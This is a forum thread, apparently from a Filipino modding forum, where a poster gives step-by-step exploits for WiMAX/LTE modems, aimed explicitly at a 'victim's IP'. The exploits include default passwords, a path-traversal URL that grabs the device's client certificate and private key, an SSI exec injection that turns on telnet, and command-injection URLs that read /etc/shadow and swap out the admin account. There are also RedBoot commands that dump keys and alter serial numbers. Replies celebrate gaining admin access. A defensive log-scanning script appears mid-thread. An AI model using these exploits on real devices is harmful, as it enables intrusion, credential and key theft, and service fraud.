Symbianize Forum


BAGSAKAN 2015 ! - cr4mfs sy

Status
Not open for further replies.
Re: LIBERTY WIXB-175x204 PEMKEY GRABBING

Go ahead and release the fix for closed ports using redboot too :D

Re: LIBERTY WIXB-175x204 PEMKEY GRABBING

Go ahead and release the fix for closed ports using redboot too :D

Yes indeed, sir cramfs :) Hopefully for the dv hahaha :D

It's hard with no GUI, it is living on borrowed time </3

It can't be configured once it gets disconnected :lolcard:

cramfs <<<<<< that's who remoted my 22m and even wrecked it :slap::slap: It probably wasn't you, TS, because why would you be helping otherwise; maybe someone just used your name. May whoever it was rest in peace.
 
LIBERTY WIXB-175x204 PEMKEY GRABBING

STEP # 1

In the Mozilla browser, open the victim's IP. LOGIN using these possible credentials:

witribe
witribe123
witribe12345

STEP # 2

Press the CTRL + SHIFT key. Click the Debugger tab. On the left side you will see sysconf.cgi. Hover your cursor over sysconf.cgi so that you can see the URL and the SID appears. As for the timestamp, even just the default timestamp that appears in your address bar will do.

View attachment 1040555

STEP # 3

Open a NEW TAB > copy and paste this exploit. Put in the appropriate IP address, SID and TIMESTAMP,
then press ENTER and the magical PEMKEY will appear.

SAMPLE EXPLOIT:


EXPLOIT:
https://ip address:8080/cgi-bin/sysconf.cgi?page=../../tmp/var/client.pem&action=request&sid=ilagay dito ang sid&timestamp=ilagay dito ang timestamp

View attachment 1040557


OPTIONAL:
FOR THOSE WHO KNOW HOW TO USE TAMPER DATA, IT IS EASIER THIS WAY.

1. LOGIN TO VICTIM'S GUI.

2. Go to Personalize Tab > Device Name. Enter FOO in New Device Name. Do not click APPLY yet.

3. Open Tamper Data, then click START, then click APPLY.

4. Uncheck Continue Tampering. Then click Tamper.

5. Then Click OK

View attachment 1040562


6. Find the GET, right-click it and choose Replay Browser.

View attachment 1040560

7. This is what should appear after you choose Replay Browser. You will see Personalize_password there. Replace it with ../../tmp/var/client.pem, then click Okay. It will then open a new tab and the pemkey will appear there.

View attachment 1040565


=======================================================================
BACKDOOR COMMANDS
=======================================================================​

Tamper Data Method:

1. Just follow the Tamper Data method via Device Name.

2. Change name to FOO

3. Start Tamper Data. Change FOO to <!--#exec cmd="cmscfg -s -n sys_telnetd -v enable"-->

4. Click OK.

5. Again find the GET > right-click, then choose Replay Browser. Personalize_password will appear there; replace it with ../../etc/hosts, then click OK.

6. TELNET IS NOW ENABLED




====================================================
COMPLETE REDBOOT COMMAND
====================================================​

BEFORE ANYTHING ELSE, I WANT TO SAY THAT I DID NOT LEECH THIS FROM ANYONE. I WILL SHOW HERE THE PROCESS OF HOW I OBTAINED THE REDBOOT COMMANDS. HERE'S THE PROOF.

1. USE THE CERT-WRITER.EXE AND SNWRITER.EXE TOOLS FROM THE BM622M.

2. DOWNLOAD WIRESHARK

3. NOW CLOSE ALL BROWSERS AND RUNNING APPLICATIONS SO THAT THEY ARE NOT DETECTED BY WIRESHARK.

4. OPEN CERT-WRITER.EXE OR SNWRITER.EXE. THEN OPEN WIRESHARK.

5. CHOOSE THE INTERFACE IN WIRESHARK: SELECT THE LAN INTERFACE, THEN CLICK START. OPEN CERT-WRITER.EXE, THEN CLICK CONNECT,
THEN UPLOAD A CERTIFICATE AND PRIVATE KEY. THIS IS SO THAT YOU CAN SEE IN WIRESHARK HOW THE PEMKEY IS WRITTEN.

6. AFTER THE PEM AND KEY ARE UPLOADED, CLICK VERIFY SO THAT YOU DUMP THE PEM AND KEY IN TURN AND SEE IT IN WIRESHARK.

7. GO TO WIRESHARK AND LOOK FOR 192.168.15.1 THERE.
IMAGE:
View attachment 1040791

8. RIGHT-CLICK 192.168.15.1, THEN CHOOSE "FOLLOW TCP STREAM". YOU WILL SEE THAT IT RECORDED THE REDBOOT COMMANDS AND OUTPUT. YOU CAN ALSO SAVE IT.

IMAGE:
View attachment 1040794


"FOR EVERYONE'S INFORMATION, THE FORMAT FOR EXTRACTING THE PEM AND KEY DIFFERS BETWEEN WI-TRIBE AND SMART."

SMART: DUMP PEM AND KEY

OPEN CMD
TYPE 192.168.15.1
LOGIN: mt7109
password: wimax

Code:
#nc 169.254.71.8 9000
<PRESS ENTER>
RedBoot>rfcal -act 48 -arg1 0 -arg2 4096
RedBoot>rfcal -act 49 -arg1 0
4084 
RedBoot>read cert_file 4084 0
-----BEGIN CERTIFICATE-----
-----END CERTIFICATE-----
RedBoot>rfcal -act 48 -arg1 1 -arg2 1712
RedBoot>rfcal -act 49 -arg1 1 
1712 
RedBoot>read cert_file 1712 0
-----BEGIN RSA PRIVATE KEY-----
-----END RSA PRIVATE KEY-----


WI-TRIBE: DUMP PEM AND KEY

OPEN CMD
TYPE 192.168.15.1
LOGIN: mt7109
password: wimax

Code:
#nc 169.254.71.8 9000
<PRESS ENTER>
RedBoot> 
rfcal -act 48 -arg1 0 -arg2 1184
RedBoot> 
rfcal -act 49 -arg1 0 
1183 
RedBoot> 
read cert_file 1183 0
-----BEGIN CERTIFICATE-----
-----END CERTIFICATE-----
RedBoot> 
rfcal -act 48 -arg1 1 -arg2 896

RedBoot> 
rfcal -act 49 -arg1 1 
896 
RedBoot> 
read cert_file 896 0
-----BEGIN RSA PRIVATE KEY-----
-----END RSA PRIVATE KEY-----

CHANGE SERIAL NUMBER

Code:
RedBoot> rfcal -act 25
RedBoot> read serialno 128 0
DVTKC133200799
RedBoot>write serialno 128 0
g 1212211123456gtk


ALL OF THIS HAS A BASIS. NORMALLY YOU CAN ONLY GET INTO REDBOOT ON PORT 9000. THIS CAN ONLY BE DONE OVER A LAN CONNECTION. THAT HAS LONG BEEN WELL KNOWN TO US.

Code:
EXAMPLE: 
telnet 192.168.15.1 9000

redboot>


AS FOR RUNNING REDBOOT INSIDE TELNET, WHICH CAN BE DONE OVER BOTH WAN AND LAN, I HAVE A BASIS FOR HOW I OBTAINED IT AND I DID NOT LEECH IT FROM ANYONE.

THE LOGIC CAN BE FOUND INSIDE THE /init.d/boot_update File Directory.

View attachment 1040797


================================================
OD235 / OD35 BACK DOOR COMMAND AND TRICK
================================================​

Code:
BROWSER BACK DOOR OD235
OPEN FIRST TAB THEN PASTE THIS THEN IT WILL SAY SUCCESSFULLY
http://192.168.254.254/cgi-bin/sysconf.cgi?page=ajax.asp&action=save_monitor_diagnostic&mon_diag_type=0&mon_diag_addr=1+%26+cat+/etc/shadow

OPEN NEW TAB
PASTE THIS COMMAND LINK. THE RESULT WILL APPEAR THERE
http://192.168.254.254/cgi-bin/sysconf.cgi?page=ajax.asp&action=diagnostic_tools_start&notrun=1
REPLACE /etc/shadow DEPENDING ON WHAT YOU WANT TO SEE.

CHANGE ADMIN LOGIN ON OD235 ONLY !! USER LOGIN ONLY / BLANK PASSWORD

Code:
OPEN FIRST TAB THEN PASTE THIS THEN IT WILL SAY SUCCESSFULLY
http://192.168.254.254/cgi-bin/sysconf.cgi?page=ajax.asp&action=save_monitor_diagnostic&mon_diag_type=0&mon_diag_addr=1+%26+deluser Superuser

OPEN NEW TAB
PASTE THIS COMMAND LINK. THE RESULT WILL APPEAR THERE
http://192.168.254.254/cgi-bin/sysconf.cgi?page=ajax.asp&action=diagnostic_tools_start&notrun=1

CHANGE ADMIN LOGIN ON OD235 ONLY !!
OPEN FIRST TAB THEN PASTE THIS THEN IT WILL SAY SUCCESSFULLY
http://192.168.254.254/cgi-bin/sysconf.cgi?page=ajax.asp&action=save_monitor_diagnostic&mon_diag_type=0&mon_diag_addr=1+%26+adduser CRAMFS

OPEN NEW TAB
PASTE THIS COMMAND LINK. THE RESULT WILL APPEAR THERE
http://192.168.254.254/cgi-bin/sysconf.cgi?page=ajax.asp&action=diagnostic_tools_start&notrun=1

DIRECTORY LIST

/etc/passwd
/etc/shadow
/mnt/jffs2/conf/user/supplicant.conf
/mnt/jffs2/conf/user/ltesetting.conf
/mnt/jffs2/conf/user/ui.conf
/mnt/jffs2/conf/iser/wmxsetting.conf
/mnt/jffs2/conf/user/sysini.conf

HIDDEN COMMANDS

cmscfg --help
-s SET
-g GET
-r REPLACE
-v VALUE
-n PARAM

SAMPLE COMMAND:

telnetd enable

cmscfg -s -n sys_telnetd -v enable

ftpd enable

cmscfg -s -n sys_ftpd -v enable

TFTP COMMAND

must have tftpd32.exe, set-up your ip to 192.168.15.2 and tftpboot directory

~#cd /mnt/jffs2/conf/user/
~#tftp -g -r /mnt/jffs2/conf/user/sysini.conf 192.168.15.2 sysini.conf---> get file

~#cd /mnt/jffs2/etc/
~#tftp -p -r shadow 192.168.15.2 shadow ---> put file

OPEN TELNET FOR BOTH WITRIBE LIBERTY AND OD235 or OD350

the command is;
Code:
fw_setenv factory 1   ----> to enable telnet , but disabled http

fw_setenv factory 0   -----> to enable http , but disabled telnet

DISCLAIMER:
I TAKE NO RESPONSIBILITY FOR WHATEVER HAPPENS TO YOUR DEVICE. STRICTLY FOR EDUCATIONAL PURPOSES ONLY.
I TAKE NO FURTHER RESPONSIBILITY IF THIS IS USED ILLEGALLY. USE IT AT YOUR OWN RISK



ENJOY :)

CR4MFS SY
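
For anyone operating or monitoring these CPEs, the request shapes in the post above (a `page=` value containing `../`, shell metacharacters in `mon_diag_addr`, and an SSI `<!--#exec` directive in a form field) can be flagged in proxy or web-server access logs. This is an added example, not part of the original post; the log format, client addresses, the `device_name` field name and the function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote_plus

# Characters that never belong in a ping/diagnostic address field.
SHELL_META = re.compile(r"[&;|`$<>\n]")
SSI_EXEC = re.compile(r"<!--\s*#\s*exec", re.IGNORECASE)
LOG_LINE = re.compile(r'^(\S+) "(?:GET|POST) (\S+)')

def classify(request_target):
    """Return sorted findings for one request target (path plus query)."""
    parts = urlsplit(request_target)
    if not parts.path.endswith("/cgi-bin/sysconf.cgi"):
        return []
    findings = set()
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        # parse_qsl decoded once; decode again to catch double encoding.
        decoded = unquote_plus(value)
        if name == "page" and (".." in decoded or decoded.startswith("/")):
            findings.add("path traversal in page")
        if name == "mon_diag_addr" and SHELL_META.search(decoded):
            findings.add("shell metacharacter in mon_diag_addr")
        if SSI_EXEC.search(decoded):
            findings.add("SSI exec directive in " + name)
    return sorted(findings)

def scan(log_lines):
    """Return (client, findings) for each suspicious line."""
    hits = []
    for line in log_lines:
        m = LOG_LINE.match(line)
        findings = classify(m.group(2)) if m else []
        if findings:
            hits.append((m.group(1), findings))
    return hits

# Constructed sample log (format, clients and the device_name field are assumed).
SAMPLE_LOG = [
    '192.0.2.10 "GET /cgi-bin/sysconf.cgi?page=ajax.asp&action=diagnostic_tools_start&notrun=1 HTTP/1.1" 200',
    '192.0.2.44 "GET /cgi-bin/sysconf.cgi?page=../../tmp/var/client.pem&action=request&sid=SID&timestamp=0 HTTP/1.1" 200',
    '192.0.2.44 "GET /cgi-bin/sysconf.cgi?page=ajax.asp&action=save_monitor_diagnostic&mon_diag_type=0&mon_diag_addr=1+%26+cat+/etc/shadow HTTP/1.1" 200',
    '192.0.2.51 "POST /cgi-bin/sysconf.cgi?page=ajax.asp&device_name=%3C!--%23exec+cmd%3D%22x%22--%3E HTTP/1.1" 200',
]

if __name__ == "__main__":
    for client, findings in scan(SAMPLE_LOG):
        print(client, "; ".join(findings))
```

A hit on any of these rules from a WAN-side address is also a sign that the management interface on port 8080 is reachable from outside and should be filtered.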




You're really good.. I'll study this.

My only remaining problem is how to get a Smart SIM working on the OD 235... I hope someone releases a tool.

My only remaining problem is how to get a Smart SIM working on the OD 235... I hope someone releases a tool.

That's not possible; the OD235 is really only for Globe postpaid SIMs.

I saw a thread saying it was supposedly openline on Smart, but its IP was still 15.1, the first release of Globe's OD235; it just comes down to the firmware.

I saw a thread saying it was supposedly openline on Smart, but its IP was still 15.1, the first release of Globe's OD235; it just comes down to the firmware.

It is openline in WiMAX mode, Smart/Globe, but on LTE it is purely Globe only, and postpaid LTE SIM at that, unless you make it GP FIRMWARE; then it can work with a Globe prepaid LTE SIM.
 
Re: LIBERTY WIXB-175x204 PEMKEY GRABBING

Can the MAC of the Liberty be changed?
 
Re: LIBERTY WIXB-175x204 PEMKEY GRABBING

niceeeeeeeeeeeeeee
 
Re: LIBERTY WIXB-175x204 PEMKEY GRABBING

CINR READING 27
MAX-MODEM
EQ-END-DATE Jan 01, 1900
INSTALLDATE Jan 4 2015 2:23PM
 
Updated now !!

Everything is there now.


It is openline in WiMAX mode, Smart/Globe, but on LTE it is purely Globe only, and postpaid LTE SIM at that, unless you make it GP FIRMWARE; then it can work with a Globe prepaid LTE SIM.

Sir Cramfs and Sir Pedik...

I just want to ask if I'm on the right track. It seems I got into the Admin/Operator account, but my SS is different from Cramfs's.

YXat1JN.png





HERE is your earlier SS, Sir Cramfs.

attachment.php
 
Boss, thanks, I now have admin on my od350 :)

Sir, what is the procedure to access the admin of the od350? Thank you.
Just PM me, sir, if it can't be posted here.
 
@logie0726

It is indeed Operator access that you got into, sir.
 